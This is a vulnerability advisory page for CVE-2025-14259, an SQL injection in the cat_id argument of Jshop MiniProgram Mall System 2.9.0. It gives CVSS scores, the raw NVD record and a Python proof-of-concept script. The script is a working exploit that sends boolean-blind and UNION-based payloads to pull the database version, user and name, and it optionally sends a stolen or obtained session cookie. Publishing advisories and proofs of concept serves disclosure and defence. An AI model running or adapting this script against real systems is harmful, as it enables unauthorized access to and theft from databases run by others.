Security Vulnerability Report
CVE-2025-14259 CVSS 6.3 MEDIUM

CVE-2025-14259

Published: 2025-12-08 18:15:51
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in Jihai Jshop MiniProgram Mall System 2.9.0. Affected by this issue is some unknown functionality of the file /index.php/api.html. The manipulation of the argument cat_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM (CVSS 3.1 base score 6.3; note that the raw NVD record below also carries a CVSS 4.0 vector that scores 2.1 LOW and a CVSS 2.0 score of 6.5, and that the record's vulnStatus is "Deferred" — weigh the rating accordingly)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is present in the NVD record; the only affected product, taken from the description, is listed below.

Jshop MiniProgram Mall System 2.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It sends live SQL payloads to whatever URL it is given, so run it only against systems you are explicitly authorized to test.
python
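import sys

import requests


# Per-request timeout in seconds; keeps a hung target from stalling the whole run.
REQUEST_TIMEOUT = 10


def exploit_sql_injection(target_url, cat_id_payload, headers=None):
    """Send one GET to *target_url* with ``cat_id`` set to *cat_id_payload*.

    PoC for CVE-2025-14259 (Jshop MiniProgram Mall System 2.9.0): the
    advisory reports SQL injection through the ``cat_id`` argument of
    ``/index.php/api.html``. It does not name the handler that reads
    ``cat_id`` ("some unknown functionality"), so if the bare endpoint
    ignores the parameter, additional request parameters may be needed --
    confirm against the target.

    Args:
        target_url: Full URL of the api.html endpoint.
        cat_id_payload: Raw value for ``cat_id``; ``requests`` URL-encodes it.
        headers: Optional extra request headers, e.g. a ``Cookie`` for an
            authenticated session. The advisory's CVSS vector is ``PR:L``,
            so the vulnerable path may only be reachable after a
            low-privilege login.

    Returns:
        The ``requests.Response`` for any HTTP reply (4xx/5xx included), or
        ``None`` when the request itself failed (timeout, DNS, refused).
    """
    params = {'cat_id': cat_id_payload}
    try:
        response = requests.get(
            target_url, params=params, headers=headers, timeout=REQUEST_TIMEOUT
        )
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None
    print(f"[*] Target: {target_url}")
    print(f"[*] Payload: {cat_id_payload}")
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response Length: {len(response.text)}")
    return response


def test_boolean_blind_injection(target_url, headers=None):
    """Probe for boolean-based blind SQL injection on ``cat_id``.

    Sends a baseline (``1``), an always-true (``1 AND 1=1``) and an
    always-false (``1 AND 1=2``) condition and compares body lengths. The
    strong signal is "true matches baseline, false differs"; a bare
    true/false difference is reported too but is weaker. Body length is a
    coarse oracle -- dynamic content (tokens, timestamps) can shift it --
    so repeat the probe before treating the result as confirmed.

    Args:
        target_url: Full URL of the api.html endpoint.
        headers: Optional extra request headers, see exploit_sql_injection.

    Returns:
        True when the responses indicate injection, False otherwise
        (including when any of the three requests failed).
    """
    print("\n[*] Testing boolean-based blind injection...")
    resp_base = exploit_sql_injection(target_url, "1", headers=headers)
    resp_true = exploit_sql_injection(target_url, "1 AND 1=1", headers=headers)
    resp_false = exploit_sql_injection(target_url, "1 AND 1=2", headers=headers)
    # Compare against None explicitly: requests.Response is falsy for any
    # 4xx/5xx status (it delegates __bool__ to .ok), and an SQL error page
    # is often exactly that -- a plain truthiness check would discard it.
    if resp_base is None or resp_true is None or resp_false is None:
        print("[!] One or more requests failed; cannot evaluate.")
        return False
    len_base = len(resp_base.text)
    len_true = len(resp_true.text)
    len_false = len(resp_false.text)
    if len_true == len_base and len_false != len_base:
        print("[+] Boolean blind injection confirmed!")
        return True
    if len_true != len_false:
        print("[?] True/false bodies differ but true does not match baseline; "
              "re-run to rule out dynamic content")
        return True
    print("[-] No length difference between true and false conditions")
    return False


def test_union_injection(target_url, headers=None):
    """Send a UNION-based payload that tries to surface version()/user()/database().

    The payload pads to eight columns; that count is a guess, not something
    the advisory states. If the target answers with an error, find the real
    column count first (``1 ORDER BY n-- -`` for increasing n) and adjust
    the NULL padding. The ``-- -`` terminator and ``version()``/``user()``/
    ``database()`` are MySQL-style; the advisory does not name the backend.

    Args:
        target_url: Full URL of the api.html endpoint.
        headers: Optional extra request headers, see exploit_sql_injection.

    Returns:
        The response from exploit_sql_injection, or None on request failure.
    """
    union_payload = "1 UNION SELECT NULL,NULL,NULL,NULL,version(),user(),database(),NULL-- -"
    print("\n[*] Testing UNION-based injection...")
    return exploit_sql_injection(target_url, union_payload, headers=headers)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14259.py <target_url> [cookie]")
        print("Example: python cve-2025-14259.py http://target.com/index.php/api.html")
        sys.exit(1)
    target = sys.argv[1]
    # Optional raw Cookie header for an authenticated session; the advisory
    # rates the flaw PR:L, so an unauthenticated probe may never reach the
    # vulnerable query.
    extra_headers = {"Cookie": sys.argv[2]} if len(sys.argv) > 2 else None
    # Basic reachability test with a benign value
    exploit_sql_injection(target, "1", headers=extra_headers)
    # Blind (boolean) probe
    test_boolean_blind_injection(target, headers=extra_headers)
    # UNION probe
    test_union_injection(target, headers=extra_headers)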

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14259", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:50.540", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Jihai Jshop MiniProgram Mall System 2.9.0. Affected by this issue is some unknown functionality of the file /index.php/api.html. The manipulation of the argument cat_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://101.200.76.102:38765/qwertyuiop/qwsdfvbnm/1/vuldb/Jshop/Jshop.html", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334765", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334765", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.702613", "source": "[email protected]"}]}}